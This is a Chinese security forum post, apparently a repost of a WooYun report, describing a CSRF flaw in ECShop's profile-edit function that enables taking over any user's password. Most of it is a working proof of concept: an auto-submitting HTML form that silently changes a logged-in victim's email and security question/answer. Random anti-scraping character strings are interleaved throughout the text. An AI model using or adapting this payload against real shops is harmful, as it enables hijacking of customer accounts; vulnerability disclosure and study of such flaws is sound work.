找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1953|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:7 n$ D, @! l7 i2 M+ k+ Z  M
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 c9 e) U1 z: ?5 K' k

7 k8 K- |, S: KDemo For:http://www.wooyun.org/bug.php?action=view&id=395
* G/ L5 i5 x2 W- d4 G8 m' {' Z" ]5 [% U6 E
详细说明:( i3 q/ V$ U2 Q8 M
利用csrf和xss可以突破官方所说的“障碍”
; F0 D/ V! v$ @' Hxss版本已经有人说明/ p/ h, b3 r# e/ d* G4 S+ {( R' }
这里给出csrf版本
* X, R! x2 q: `* X9 x! |7 ~! c. V" {. G; H3 X8 ?" m, V1 i# t
漏洞证明:
  b1 @/ R$ r0 F9 X<html>
( C- a6 R# X2 P' s* A3 q$ q  U8 g<body>
( j: w/ G2 j7 o  A<form action="http://www.wooyun.org/ecshop/user.php" method="POST">' E7 P/ z( p9 F6 g& T0 {3 L; u: W; \
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
  K7 F: D/ @- f# r7 z4 m<INPUT TYPE="text" NAME="act" value="act_edit_profile">
2 }1 \) ?+ S' v) D% W<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ a$ B/ Y5 R  ^9 a. A
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. L5 S" R% j+ ~9 k" `& u3 G
</body>
7 Z6 ?6 I& ?; g3 R<script>
( Q9 K- Y/ z3 j. B, \' W$ wdocument.forms[0].submit();/ ^; v* O. {7 U/ @+ f9 _# y% q* H
</script>7 A$ L7 [$ v, V* Y6 H- a
</html>6 [( U' w5 n0 B1 Z) \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失  B0 S# n2 c" ^6 A) d% X

7 Z% l6 R1 [! U3 r8 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表